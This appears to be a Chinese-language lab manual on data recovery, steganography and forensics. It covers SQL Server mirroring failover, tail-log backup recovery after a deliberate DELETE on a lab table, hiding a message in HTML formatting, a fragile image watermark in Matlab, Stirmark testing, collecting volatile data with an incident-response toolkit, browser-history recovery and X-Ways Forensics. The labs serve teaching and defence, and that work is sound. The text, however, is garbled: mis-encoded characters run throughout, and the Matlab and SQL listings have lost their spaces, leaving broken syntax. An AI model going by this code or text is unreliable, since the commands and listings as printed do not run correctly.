注意：跨數(shù)據(jù)庫事務(wù)和分布式事務(wù)均不支持?jǐn)?shù)據(jù)庫鏡像。案例2【鏡像容災(zāi)方法1】案例2描述：數(shù)據(jù)庫服務(wù)器，HIS的A群集作為主服務(wù)器，數(shù)據(jù)流通過鏡像傳向B機(jī)（單臺(tái)服務(wù)器），HIS服務(wù)器無法連接上，發(fā)現(xiàn)HIS數(shù)據(jù)庫服務(wù)器群集硬件故障，藍(lán)屏，并且無法重啟，此時(shí)鏡像服務(wù)器B機(jī)還處于“正在還原”狀態(tài)，必須將B機(jī)狀態(tài)切到正常訪問狀態(tài)。步驟1：連接鏡像服務(wù)器B機(jī)，輸入SQL語句：usemasterrestoredatabasetestDBwithrecovery步驟2：執(zhí)行SQL語句，將數(shù)據(jù)庫恢復(fù)為可以被訪問的狀態(tài)。步驟3：將B機(jī)的IP地址改為A群集的群集IP地址即可。（IP地址的切換可以利用windowscluster進(jìn)行自動(dòng)切換效果更佳，鏡像就直接做在一個(gè)群集內(nèi)部的兩臺(tái)機(jī)器上。）步驟4：整個(gè)切換過程耗時(shí)4分鐘左右。在合適的時(shí)候，通過事務(wù)日志和增量備份還原的方法，再把在B機(jī)上產(chǎn)生的事務(wù)和數(shù)據(jù)導(dǎo)入到A群集中去。

注意：這種切換方式仍然會(huì)丟失尚未提交的事務(wù)，在前一種故障模擬場(chǎng)景中，也可以直接采用這種方式進(jìn)行容災(zāi)切換。三、拓展任務(wù)任務(wù)【幾種常見容災(zāi)方案對(duì)比】以下是幾種常見容災(zāi)方案對(duì)比情況說明，請(qǐng)查閱相關(guān)資料了解各種容災(zāi)方案的實(shí)際應(yīng)用案例或者應(yīng)用場(chǎng)景說明。項(xiàng)目陣列型容災(zāi)DATAGUARD第三方數(shù)據(jù)庫復(fù)制CDP容災(zāi)技術(shù)架構(gòu)基于存儲(chǔ)的硬件復(fù)制ORACLE自身容災(zāi)機(jī)制日志復(fù)制技術(shù)基于存儲(chǔ)網(wǎng)絡(luò)的數(shù)據(jù)復(fù)制硬件成本采購存儲(chǔ)和同步軟件，成本高只需采購主機(jī)（存儲(chǔ)），成本低采購第三方軟件采購CDP設(shè)備，成本高本異地存儲(chǔ)可否不同必須同品牌存儲(chǔ)可以不同，甚至可以不用存儲(chǔ)可以不同可以不同服務(wù)器類型限制容災(zāi)中心可以無主機(jī)容災(zāi)中心和主機(jī)房必須有同樣硬件架構(gòu)和系統(tǒng)軟件的主機(jī)無限制無限制鏈路成本必須采用光纖專線，成本高可用以太網(wǎng)專線，成本低可用以太網(wǎng)專線，成本低可用以太網(wǎng)專線，成本低帶寬優(yōu)化無，對(duì)帶寬要求十分苛刻無，對(duì)帶寬要求較低無，對(duì)帶寬要求較低特有精簡式傳輸技術(shù)數(shù)據(jù)壓縮加密功能無無有有，可以保證數(shù)據(jù)傳送過程中不被竊取對(duì)生產(chǎn)機(jī)性能影響無影響較小的影響較小的影響影響極小，官方宣稱系統(tǒng)資源占用小于1%支持隨時(shí)隨地的恢復(fù)演練恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜恢復(fù)演練需要主機(jī)環(huán)境配合，步驟復(fù)雜可以基于虛擬機(jī)環(huán)境做恢復(fù)演練，步驟簡單易行多對(duì)一的異地容災(zāi)架構(gòu)無有有有后期操作維護(hù)中等中等簡單簡單對(duì)應(yīng)用容災(zāi)的支持可以支持（應(yīng)用內(nèi)容復(fù)制）不支持，需要另外設(shè)定同步策略不支持可以支持（應(yīng)用內(nèi)容復(fù)制）總體投資大小大大

2.4【實(shí)訓(xùn)9】誤操作數(shù)據(jù)庫恢復(fù)方法（日志尾部備份）一、實(shí)訓(xùn)目的1.了解避免數(shù)據(jù)誤刪除的日志尾部備份策略；2.掌握對(duì)故障的分析方法以及安全方案的設(shè)計(jì)。二、實(shí)訓(xùn)任務(wù)案例描述：經(jīng)?？吹接腥苏`刪數(shù)據(jù)，或者誤操作，特別是update和delete的時(shí)候沒有加where，將導(dǎo)致數(shù)據(jù)被刪除的風(fēng)險(xiǎn)。本次實(shí)訓(xùn)將利用日志尾部備份的方式對(duì)數(shù)據(jù)進(jìn)行恢復(fù)。任務(wù)1【故障復(fù)現(xiàn)】步驟1：檢查數(shù)據(jù)庫的恢復(fù)模式，確?；謴?fù)模式為完整模式。或者利用腳本進(jìn)行檢查，腳本如下所示。

SELECT

recovery_model,recovery_model_desc

FROM

sys.databases

WHERE

name

='AdventureWorks'

結(jié)果如下：步驟2：至少為數(shù)據(jù)庫做一次完整備份。在創(chuàng)建完一個(gè)新數(shù)據(jù)庫之后，強(qiáng)烈建議甚至強(qiáng)制做一次完整備份?？梢杂孟旅娴腟QL語句檢查是否做過完整備份。SELECT

database_name,recovery_model,name

FROM

msdb.dbo.backupset

步驟3：首先先創(chuàng)建一張表testTable，并加入一些數(shù)據(jù)。/*

由于tempdb永遠(yuǎn)為簡單恢復(fù)模式，所以不適合做案例。

這里使用微軟的示例數(shù)據(jù)庫AdventureWorks

*/

USE

AdventureWorks

GO

IF

OBJECT_ID（'testTable'）

IS

NOT

NULL

DROP

TABLE

testTableGO

CREATE

TABLE

testTable

(

id

INT

IDENTITY(1,

1),

NAME

VARCHAR(50)

);步驟4：然后做個(gè)刪除操作，利用WAITFOR命令準(zhǔn)確定位刪除發(fā)生的時(shí)間點(diǎn)

'17:45'

。USE

AdventureWorks

GO

WAITFOR

TIME

'17:45'

DELETE

FROM

dbo.testTable任務(wù)2【備份日志尾部】步驟1：在數(shù)據(jù)庫屬性頁中的【常規(guī)】頁選擇【事務(wù)日志】，【選項(xiàng)】頁中勾選備份日志尾部。并且保證數(shù)據(jù)庫不要有其他人連接，因?yàn)閭浞萑罩疚膊繒?huì)使數(shù)據(jù)庫處于還原狀態(tài)，拒絕其他會(huì)話的連接，如果不斷開其他連接，將無法備份。也可以用如下腳本完成：USE

Master

GO

BACKUP

LOG

[AdventureWorks]

TO

DISK

=

N'E:\AdventureWorks.bak'

WITH

NO_TRUNCATE

,

NOFORMAT,

NOINIT,

NAME

=

N'AdventureWorks-事務(wù)日志

備份',

SKIP,

NOREWIND,

NOUNLOAD,

NORECOVERY,

COMPRESSION,STATS

=

10,CHECKSUM

GO

declare

@backupSetId

as

int

select

@backupSetId

=

position

from

msdb..backupset

where

database_name=N'AdventureWorks'

and

backup_set_id=(select

max(backup_set_id)

from

msdb..backupset

where

database_name=N'AdventureWorks'

)

if

@backupSetId

is

null

begin

raiserror(N'驗(yàn)證失敗。找不到數(shù)據(jù)庫“AdventureWorks”的備份信息。',

16,1)

end

RESTORE

VERIFYONLY

FROM

DISK

=

N'E:\AdventureWorks.bak'

WITH

FILE

=

@backupSetId,

NOUNLOAD,

NOREWIND

GO

步驟2：此時(shí)，數(shù)據(jù)庫會(huì)處于【正在還原】的狀態(tài)，如果發(fā)現(xiàn)備份不了可以用下面語句查看，SELECT

*

FROM

sys.sysprocesses

WHERE

dbid=DB_ID('AdventureWorks')步驟3：如果找都有spid，可以用刪除的方法把spid殺掉：步驟4：接著繼續(xù)備份。步驟5：然后進(jìn)行還原，先還原完整備份，選擇最近的那次，由于日志備份的特性，只認(rèn)最后一次備份，所以要選擇最新的那次，否則還原不了。特別注意：在【選項(xiàng)】頁中勾選【不對(duì)數(shù)據(jù)庫執(zhí)行任何操作，不回滾未提交的事務(wù)?？梢赃€原其他事務(wù)日志】。步驟6：接著還原日志文件（任務(wù)--還原--事務(wù)日志）。并在時(shí)間點(diǎn)處選擇剛剛的時(shí)間截點(diǎn)

'17:45'之前的某一個(gè)時(shí)間，如

'17:44'，把時(shí)間點(diǎn)指定到你誤刪除的時(shí)間之前即可。步驟7：在【選項(xiàng)】頁中勾選【回滾未提交的事務(wù)，使數(shù)據(jù)庫處于可以使用的狀態(tài)。無法還原其他事務(wù)日志】步驟8：檢查testTable，數(shù)據(jù)已經(jīng)還原成功。

專題3數(shù)據(jù)隱藏與數(shù)字水印3.1【實(shí)訓(xùn)10】HTML信息隱藏一、實(shí)訓(xùn)目的1.了解格式化文件信息隱藏的特點(diǎn)；2.掌握如何利用HTML語言的特征來隱藏秘密信息；3.實(shí)現(xiàn)基于HTML語言的信息隱藏；4.根據(jù)HTML語言特點(diǎn)設(shè)計(jì)其他的信息隱藏方法，并實(shí)現(xiàn)該方法。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)原理說明】常見在HTML中進(jìn)行信息隱藏的方法如下：（1）在網(wǎng)頁結(jié)束標(biāo)記</html>后或者在每行的行尾插入空格或Tab鍵隱藏信息，插入一個(gè)空格代表0，插入一個(gè)Tab代表1。（2）修改標(biāo)記屬性名稱的大小寫來隱藏信息，因?yàn)闃?biāo)記屬性名稱對(duì)大小寫不敏感。如用標(biāo)記名稱字母全部大寫代表1，全部小寫代表0。這樣一個(gè)屬性名稱可隱藏1bit信息。（3）修改屬性值字符串的大小寫來隱藏信息，因?yàn)閷傩灾底址畬?duì)大小寫不敏感。如用屬性字母的大寫代表1，小寫代表0。（4）將屬性值外面的雙引號(hào)“”，單引號(hào)‘’替換來隱藏信息，因?qū)傩灾涤脝我?hào)和用雙引號(hào)括起來是等價(jià)的。如用雙引號(hào)代表1，單引號(hào)代表0。（5）某空元素標(biāo)記具有兩種等價(jià)格式，如標(biāo)記<BR>可以寫成<BR/>。我們可以用一種格式代表1，另一種格式代表0。這樣的標(biāo)記還有<HR>=<HR/>,<IMG>=<IMG/>等。則一結(jié)這樣的標(biāo)記可隱藏1bit信息?！緦?shí)訓(xùn)方法說明】在本實(shí)訓(xùn)中，采用的隱藏方法如下所示：（1）利用標(biāo)記中屬性賦值號(hào)“＝”左右添加空格來隱藏信息。以左右都無空格表示00，左無右有空格表示01，左有右無空格表示10，左右均有空格表示11，則一個(gè)屬性賦值可隱藏2bit信息。（2）標(biāo)記名稱（除<p>和</p>外）字母全部大寫代表1，全部小寫代表0。這樣一個(gè)標(biāo)記名稱可隱藏1bit信息。（3）屬性字母的大寫代表1，小寫代表0。這樣一個(gè)屬性名稱可隱藏1bit信息。（4）在網(wǎng)頁結(jié)束標(biāo)記</html>后或者在每行的行尾插入空格或Tab鍵隱藏信息，插入一個(gè)空格代表0，插入一個(gè)Tab代表1。【實(shí)訓(xùn)步驟】步驟1：選擇載體HTML文件，打開網(wǎng)址如下：/cs_web/introduce/xxaqcenter.html復(fù)制其源代碼用UltraEdit打開如下圖所示：圖3-8選擇HTML文件步驟2：輸入待隱藏信息在上述的HTML文件中隱藏ILOVEYOU，將ILOVEYOU轉(zhuǎn)換成ASCII碼二進(jìn)制形式為：0100100101001100010011110101011001000101010110010100111101010101步驟3：選擇隱藏方法（1）利用標(biāo)記中屬性賦值號(hào)“＝”左右添加空格來隱藏信息。以左右都無空格表示00，左無右有空格表示01，左有右無空格表示10，左右均有空格表示11，則一個(gè)屬性賦值可隱藏2bit信息。（2）標(biāo)記名稱（除<p>和</p>外）字母全部大寫代表1，全部小寫代表0。這樣一個(gè)標(biāo)記名稱可隱藏1bit信息。（3）屬性字母的大寫代表1，小寫代表0。這樣一個(gè)屬性名稱可隱藏1bit信息。（4）在網(wǎng)頁結(jié)束標(biāo)記</html>后或者在每行的行尾插入空格或Tab鍵隱藏信息，插入一個(gè)空格代表0，插入一個(gè)Tab代表1.步驟4：隱藏效果（1）修改HTML文本內(nèi)容后，如下圖所示：圖3-9修改HTML文件（2）瀏覽隱寫前與隱寫后的頁面效果：圖3-10HTML前后沒有任何差別從兩幅圖可以看出，在視覺上沒有任何差別，而實(shí)際上已經(jīng)隱藏了秘密信息。在本實(shí)訓(xùn)中，通過設(shè)計(jì)的信息隱藏方法，成功的將ILOVEYOU隱寫在選擇的HTML文件中，并且使得頁面瀏覽效果與之前沒什么不同。

3.2【實(shí)訓(xùn)11】圖片隱寫-完全脆弱圖像水印一、實(shí)訓(xùn)目的1.了解脆弱水印和半脆弱水印原理；2.設(shè)計(jì)被實(shí)現(xiàn)一種完全脆弱水印算法。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Matlab軟件【實(shí)訓(xùn)原理說明】1、嵌入信息校驗(yàn)和算法首先計(jì)算每個(gè)像素字節(jié)最高7位的Checksum值，Checksum值定義為一系列相同長度數(shù)據(jù)的二進(jìn)制位的模2和。在該算法中，此長度為8個(gè)連續(xù)像素中的最高7位的聯(lián)合長度，共56位。在Checksum值計(jì)算過程中，整幅圖像中的每個(gè)像素都參與計(jì)算，但每個(gè)像素只計(jì)算一次，最后結(jié)果為56位的數(shù)據(jù)。該算法隨后在圖像中隨機(jī)選取56個(gè)像素，將每個(gè)像素的最低位變?yōu)榕c上述Checksum比特位相同，以此存儲(chǔ)Checksum值，從而完成水印的嵌入。2、提取信息在提取水印時(shí)，只需計(jì)算圖像的Checksum值并與水印信息中的Checksum值進(jìn)行比較，便可知水印是否因遭受篡改而被損壞?！緦?shí)訓(xùn)效果】1、圖像顯示截圖圖原始圖像和攜密圖像的對(duì)比圖結(jié)果：在顯示上兩者基本無差別。2、檢查圖像是否被修改圖提取秘密信息結(jié)果：diff數(shù)組值全為0，表示圖像未被修改。【實(shí)訓(xùn)步驟】步驟1：嵌入秘密信息。參考代碼clc;clear;oi=imread('lena.bmp');[orow,ocol]=size(oi);pixelcount=orow*ocol;%計(jì)算總像素個(gè)數(shù)count=floor(pixelcount/8);%總像素分為8個(gè)一組wi=oi(:);fori=1:count%用于存放56比特forj=1:56l(i,j)=uint8(0);endendk=1;i=1;fori=1:countwherestart=8*(i-1);forj=1:8b(i,j)=wi(wherestart+j);endend%把每個(gè)像素值的高7位取出，順序?yàn)?、3、4、5、6、7、8modcount=1;fori=1:countforj=1:8fork=1:7l(i,7*(j-1)+k)=bitget(b(i,j),k+1);modcount=modcount+1;endendend%把所有的56位的值按照模2加得到一個(gè)56位長度的Checksum值z(mì)=sum(l,1);fori=1:56z(1,i)=mod(z(1,i),2);end%從圖像中隨機(jī)選取56個(gè)像素點(diǎn)key=123%用戶選取隨機(jī)嵌入的位置z=uint8(z);[row,col]=randselect(oi,56,key);fork=1:56temp(k)=oi(row(k),col(k));temp1=str2bit(temp(k));temp1(8)=z(k);oi(row(k),col(k))=bit2str(temp1);endimwrite(oi,'watermarked.bmp','bmp');figure;subplot(1,2,1);imshow('lena.bmp');title('原始圖像');subplot(1,2,2);imshow('watermarked.bmp');title('添加水印信息的圖像');步驟2：提取秘密信息。參考代碼clc;clear;oi=imread('watermarked.bmp');[orowocol]=size(oi);pixelcount=orow*ocol;%計(jì)算總像素個(gè)數(shù)count=floor(pixelcount/8);wi=oi(:);fori=1:count%用于存放56比特forj=1:56l(i,j)=uint8(0);endendk=1;i=1;fori=1:countwherestart=8*(i-1);forj=1:8b(i,j)=wi(wherestart+j);endend%把每個(gè)像素值的高7位取出，順序?yàn)?,3,4,5,6,7,8modcount=1;fori=1:countforj=1:8fork=1:7l(i,7*(j-1)+k)=bitget(b(i,j),k+1);modcount=modcount+1;endendend%把所有的56位的值按照模2加得到一個(gè)56位長度的Checksum值z(mì)=sum(l,1);fori=1:56z(1,i)=mod(z(1,i),2);end%從圖像中選取56個(gè)像素值key=123;%用戶選取隨機(jī)嵌入的位置fork=1:56watermark(1,k)=0;end[rowcol]=randselect(oi,56,key);fork=1:56watermark(1,k)=bitget(oi(row(k),col(k)),1);endfork=1:56diff(1,k)=z(1,k)-watermark(1,k);endfork=1:56ifdiff(1,k)~=0modified=1;elsemodified=0;endend

3.3【實(shí)訓(xùn)12】檢測(cè)水印算法魯棒性 一、實(shí)訓(xùn)目的1.了解檢測(cè)水印算法魯棒性；2.設(shè)計(jì)被實(shí)現(xiàn)一種完全脆弱水印算法。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Matlab軟件【Stirmark水印算法魯棒性檢測(cè)】Stirmark是一個(gè)檢測(cè)水印算法魯棒性的攻擊工具。做法是：給定嵌入水印的圖像，Stirmark生成一定數(shù)量的修改圖像，這些被修改的圖像被用來驗(yàn)證水印是否能被檢測(cè)出。攻擊手段包括線性濾波、非線性濾波、剪切/拼接攻擊、同步性破壞攻擊等。步驟1：打開Media文件夾，有兩個(gè)子文件夾Input和Output。將待檢測(cè)的圖像放入\Media\Input\Images\Set1中。步驟2：雙擊\Bin\Benchmark中的StirMarkBenchmark.exe（stirmark主程序），程序自動(dòng)運(yùn)行，將待測(cè)圖像的各種檢測(cè)結(jié)果圖像放入\Media\Onput\Images\Set1中。步驟3：運(yùn)行完后Bin\Benchmark文件夾下生成的log日志文件記錄了詳細(xì)攻擊策略信息。并計(jì)算攻擊后的誤碼率。

專題4數(shù)字取證技術(shù)4.1【實(shí)訓(xùn)13】易失性數(shù)據(jù)收集 一、實(shí)訓(xùn)目的1.了解易失性數(shù)據(jù)收集方法；2.能對(duì)突發(fā)事件進(jìn)行初步調(diào)查，做出適當(dāng)?shù)捻憫?yīng)；3.能在最低限度地改變系統(tǒng)狀態(tài)的情況下收集易失性數(shù)據(jù)。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】一個(gè)U盤（或其他移動(dòng)介質(zhì)）和PsTools工具包【實(shí)訓(xùn)步驟】步驟1：將常用的響應(yīng)工具存入U(xiǎn)盤，創(chuàng)建應(yīng)急工具盤。應(yīng)急工具盤中的常用工具有cmd.exe;netstat.exe;fport.exe;nslookup.exe;nbtstat.exe;arp.exe;md5sum.exe;netcat.exe;cryptcat.exe;ipconfig.exe;time.exe;date.exe等。步驟2：用cmd命令進(jìn)入工具安裝的目錄。用命令md5sum創(chuàng)建工具盤上所有命令的校驗(yàn)和，生成文本文件commandsums.txt保存到工具盤上，并將工具盤寫保護(hù)。避免計(jì)算機(jī)木馬程序更改軟件，這與最后的校驗(yàn)形成對(duì)比。命令如下： md5sum.exe*>commandsums_first.txt步驟3：用time和date命令記錄現(xiàn)場(chǎng)計(jì)算機(jī)的系統(tǒng)時(shí)間和日期，步驟4：用dir命令列出現(xiàn)場(chǎng)計(jì)算機(jī)系統(tǒng)上所有文件的目錄清單，記錄文件的大小、訪問時(shí)間、修改時(shí)間和創(chuàng)建時(shí)間。步驟5：用ipconfig命令獲取現(xiàn)場(chǎng)計(jì)算機(jī)的IP地址、子網(wǎng)掩碼、默認(rèn)網(wǎng)關(guān)，用ipconfig/all命令獲取更多有用的信息：如主機(jī)名、DNS服務(wù)器、節(jié)點(diǎn)類型、網(wǎng)絡(luò)適配器的物理地址等。步驟6：用netstat顯示現(xiàn)場(chǎng)計(jì)算機(jī)的網(wǎng)絡(luò)連接、路由表和網(wǎng)絡(luò)接口信息，檢查哪些端口是打開的，以及與這些監(jiān)聽端口的所有連接。步驟7：用PsTools工具包中的PsLoggedOn命令查看當(dāng)前哪些用戶與系統(tǒng)保持著連接狀態(tài)。步驟8：用PsTools工具包中的PsList命令記錄當(dāng)前所有正在運(yùn)行的進(jìn)程和當(dāng)前的連接。步驟9：再運(yùn)行一遍time和date命令。步驟10：輸入命令md5sum.exe*>commandsums_last.txt使校驗(yàn)碼保存為文本文檔。查看保存在取證工具根目錄下的兩次的校驗(yàn)文檔?！緦?shí)訓(xùn)思考】1.為什么每次取證完成，必須記錄當(dāng)下時(shí)間和日期？2.為什么實(shí)訓(xùn)開始和結(jié)尾必須把校驗(yàn)碼保存為文本文檔？（commandsums_first.txt和commandsums_last.txt文本文檔）；3.通過本次實(shí)訓(xùn)數(shù)據(jù)，分析出什么結(jié)果？

4.2【實(shí)訓(xùn)14】瀏覽器歷史記錄數(shù)據(jù)恢復(fù)提取方法 一、實(shí)訓(xùn)目的1.了解電子取證方法；2.能對(duì)360瀏覽器歷史記錄文件進(jìn)行快速解析和提取。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】效率源手機(jī)數(shù)據(jù)恢復(fù)工具【案例背景】近年來，利用計(jì)算機(jī)進(jìn)行網(wǎng)絡(luò)犯罪呈高增長態(tài)勢(shì)，瀏覽器歷史痕跡成為計(jì)算機(jī)取證的重點(diǎn)。由于某些瀏覽器保存記錄方法是自己特定的格式，市面上很少有工具或者方法針對(duì)這種文件解析，所以這種瀏覽器歷史痕跡被刪除后，如果沒有解析方法，整個(gè)痕跡提取環(huán)節(jié)就陷入僵局。目前，市面上主要瀏覽器有微軟IE、谷歌Chrome、奇虎360瀏覽器、搜狗瀏覽器、百度瀏覽器等。其中，360瀏覽器作為主流瀏覽器之一，占有較高市場(chǎng)份額，而它的瀏覽器保存記錄方法就屬于特定格式。因此，研究360瀏覽器的歷史痕跡提取方法并形成有效的電子證據(jù)，對(duì)計(jì)算機(jī)取證有重要意義?！緦?shí)訓(xùn)步驟】步驟1.確定360瀏覽器歷史痕跡文件位置360瀏覽器歷史記錄文件在不同操作系統(tǒng)中存儲(chǔ)位置也不一樣，可根據(jù)當(dāng)前操作系統(tǒng)查到對(duì)應(yīng)的存儲(chǔ)位置。比如：360痕跡文件在Windows7/8系統(tǒng)下路徑為：C:\Users\用戶名\AppData\Roaming\360se6\UserData\Default\History。步驟2.分清360瀏覽器歷史痕跡文件的類型360瀏覽器歷史痕跡文件在不同操作系統(tǒng)中記錄歷史痕跡的文件類型也不一樣。目前研究發(fā)現(xiàn)，360瀏覽器歷史痕跡文件主要有兩類；一類是XP系統(tǒng)下的二進(jìn)制dat文件類型；另一類是win7/8系統(tǒng)下的sqlite3數(shù)據(jù)庫類型。本次實(shí)訓(xùn)以win7/8系統(tǒng)為例。步驟3.解析360瀏覽器歷史痕跡文件（解析sqlite3數(shù)據(jù)庫）Sqlite3是一種輕型數(shù)據(jù)庫，目前有多種成熟解析與提取方法，有眾多軟件可以支持該數(shù)據(jù)庫提取，如sqliteexpert、效率源手機(jī)數(shù)據(jù)恢復(fù)工具都可以直接打開查看。針對(duì)刪除歷史痕跡信息，可以使用“效率源手機(jī)數(shù)據(jù)恢復(fù)工具”軟件中的特征庫方式進(jìn)行全盤檢索恢復(fù)。所謂的特征庫方式，就是按照現(xiàn)有數(shù)據(jù)排列格式在空閑區(qū)域中進(jìn)行篩查，判斷是否存在這種規(guī)律的數(shù)據(jù)，存在即為刪除丟失的歷史痕跡信息。以效率源手機(jī)數(shù)據(jù)恢復(fù)工具為例，檢索結(jié)果顯示綠色部分為正常數(shù)據(jù)，紅色部分為丟失刪除數(shù)據(jù)。4.3【實(shí)訓(xùn)15】X-waysForensics取證 一、實(shí)訓(xùn)目的1.能利用X-waysForensics進(jìn)行簡單取證；2.了解X-waysForensics取證分析的一般過程；3.能使用X-waysForensics調(diào)查案件、搜索和查找證據(jù)、生成報(bào)告。二、實(shí)訓(xùn)任務(wù)【實(shí)訓(xùn)環(huán)境說明】Windows操作系統(tǒng)，X-waysForensics工具【實(shí)訓(xùn)步驟】步驟1.創(chuàng)建連接好硬件介質(zhì)后，打開X-ways軟件，當(dāng)需要?jiǎng)?chuàng)建案例時(shí)，選擇文件，新建一個(gè)案例。接下來，在案件數(shù)據(jù)對(duì)話框中填寫案例信息，可輸入案件名稱、案件描述、調(diào)查員、機(jī)構(gòu)地址等輔助信息，其中案件名稱使用英文或數(shù)字，否則案件日志和報(bào)告中無法出現(xiàn)屏幕快照?qǐng)D片，如下圖所示。注意：為保障數(shù)據(jù)分析中顯示的時(shí)間正確，需在顯示時(shí)區(qū)中設(shè)置正確的時(shí)區(qū)信息。圖案例信息案件創(chuàng)建后，需要添加所需分析的目標(biāo)可以添加物理存儲(chǔ)設(shè)備，如磁盤、光盤、USB存儲(chǔ)設(shè)備等，也可以添加EO1鏡像、DD磁盤鏡像，以及X-ways自有的證據(jù)文件格式。下面以添加鏡像文件為例，如下圖所示。圖添加鏡像鏡像添加結(jié)束后，可看到鏡像的基本信息，如分區(qū)、文件系統(tǒng)等，如下圖所示。圖打開鏡像文件后的界面打開后可查看個(gè)分區(qū)的文件，如下圖所示。圖第二分區(qū)文件目錄步驟2.X-waysForensics文件過濾在X-wavsForensics中，可方便地對(duì)各種類型的數(shù)據(jù)文件進(jìn)行過濾操作。當(dāng)使用某過流條件時(shí)，只需單擊文件名稱左側(cè)的漏斗，輸入過濾條件，單擊激活即可顯示過濾結(jié)果。文件名過濾支持多語種字符，如需取消某過濾條件，單擊禁用即可。下面簡單介紹幾種過濾形式。（1）按文件名稱過濾可以使用通配符，針對(duì)特定文件名稱進(jìn)行過濾。如搜索“*doc，*hmm，*，tmp”等。使用通符時(shí)，不能出現(xiàn)兩個(gè)*。此種過濾方式適用于對(duì)文件名及單一文件類型過濾。速度快，準(zhǔn)確率高。例如，如果需要查找文件內(nèi)容包含“unlink”的文件，可在標(biāo)記文件中搜索關(guān)鍵詞“unlink”。具體操作如圖所示。圖按文件名稱過濾圖按文件名稱過濾結(jié)果（2）按文件類型過濾照設(shè)定的文件分類，對(duì)不同類型的文件進(jìn)行過濾。通過此過濾方式，可以容易地將辦公文檔、圖形圖像、壓縮文件，以及各種重要數(shù)據(jù)（如注冊(cè)表文件、互聯(lián)網(wǎng)歷史記錄、回收站文件、打印池、Windows交換文件、日志等）快速過濾出來。使用方法：選擇相應(yīng)文件類型，單擊激活。過濾前，應(yīng)在磁盤快照中選擇依據(jù)文件簽名校驗(yàn)文件真實(shí)類型，才能夠判斷出文件的真實(shí)類型，如下圖所示。圖按文件類型過濾（3）按文件大小過濾根據(jù)文件的實(shí)際大小過濾，不包括殘留區(qū)數(shù)據(jù)。兩個(gè)選項(xiàng)同時(shí)使用，用于設(shè)定一定容量大小之間的文件。如圖所示，可過濾文件大小在3kb~1MB之間的文件。圖過濾條件（4）按文件時(shí)間進(jìn)行過濾創(chuàng)建時(shí)間：當(dāng)前磁盤中文件和目錄的創(chuàng)建時(shí)間。修改時(shí)間：當(dāng)前磁盤中文件和目錄最后修改的時(shí)間。訪問時(shí)間：當(dāng)前磁盤中文件和目錄最后讀取或訪問的時(shí)間。記錄更新時(shí)間:NTFS或Linux文件系統(tǒng)中，文件和目錄的最后修改時(shí)間。這是包含于文件元數(shù)據(jù)中的文件系統(tǒng)數(shù)據(jù)結(jié)構(gòu)。刪除時(shí)間：Linux系統(tǒng)下文件和目錄的刪除時(shí)間。例如，按文件記錄修改時(shí)間進(jìn)行過濾，具體操作如圖所示。圖過濾時(shí)間條件設(shè)置（5）按文件屬性進(jìn)行過濾文件都有自己的屬性，常見文件屬性有A=文檔，H=隱含文件，S=系統(tǒng)文件，P=連接點(diǎn)，C=文件系統(tǒng)級(jí)壓縮，c=壓縮文件中的加密，e!=特定文件類型加密，E=文件系統(tǒng)級(jí)加密，e?=加密可能性較大，T=臨時(shí)文件，O=文件處于脫機(jī)狀態(tài)。以過濾加密文件為例，其操作如圖所示。圖過濾加密文件步驟3.X-waysForensics同步搜索允許用戶指定一個(gè)搜索關(guān)鍵詞列表文件，每行設(shè)定一個(gè)搜索關(guān)鍵詞。所發(fā)現(xiàn)的搜索關(guān)鍵詞被保存在搜索列表中或位置管理器中。操作如下：將所有文件展開，或通過過濾選擇所需搜索的文件。（1）在特定文件中搜索，需首先選擇文件，并添加標(biāo)記。之后，在標(biāo)記數(shù)據(jù)中搜索，如在所有文件中搜索，無須選擇文件，直接選擇在所有數(shù)據(jù)中搜索。（2）單擊同步搜索。（3）輸入關(guān)鍵詞，每行一個(gè)關(guān)鍵詞，支持空格。（4）選擇字符編碼。（5）選擇搜索方式，搜索方式有物理搜索、邏輯搜索、在索引中搜索3種方式，可根據(jù)具體情況選擇不同搜索方式。搜索結(jié)束后，顯示所有包含關(guān)鍵詞的搜索結(jié)果。步驟4.生成報(bào)告（1）添加至報(bào)告表創(chuàng)建報(bào)告前，需選擇所關(guān)注的文件，然后單擊鼠標(biāo)右鍵，添加至報(bào)告表。根據(jù)文件內(nèi)容或類別，可新建報(bào)告表，命名為“關(guān)注的文檔”“x地址”“x電子郵件”等。只有將文件添加至報(bào)告表后，這些文件才能被包含在報(bào)告中。（2）創(chuàng)建報(bào)告，如圖所示圖創(chuàng)建報(bào)告（3）設(shè)置選項(xiàng)輸入報(bào)告頭，封面信息，選用的徽章圖像，所需包含的報(bào)告表，包含的項(xiàng)目名及內(nèi)容。如果選擇了包含操作記錄日志，分析過程中的所有屏幕畫面圖片、所執(zhí)行的命令及運(yùn)行結(jié)果，都可包含在報(bào)告中，如下圖所示。圖報(bào)告基本信息設(shè)置（4）報(bào)告樣例生成的報(bào)告樣例為.html格式。【拓展任務(wù)】任務(wù)1：查找名稱為“code”的文件，查看其內(nèi)容并計(jì)算Hash值。(提示：code.txt和code.docx，存儲(chǔ)于D盤)任務(wù)2：查找創(chuàng)建時(shí)間為2019年1月12日的jpg圖片，其內(nèi)容顯示與手機(jī)有關(guān)。請(qǐng)搜索并計(jì)算相應(yīng)的校驗(yàn)值。(提示：設(shè)定檢索范圍)【實(shí)訓(xùn)思考】1.簡要描述X-waysForensics取證分析的一般過程。2.如何通過X-waysForensics分析注冊(cè)表中常見信息？3.如何通過X-waysForensics按文件類型過濾證據(jù)？

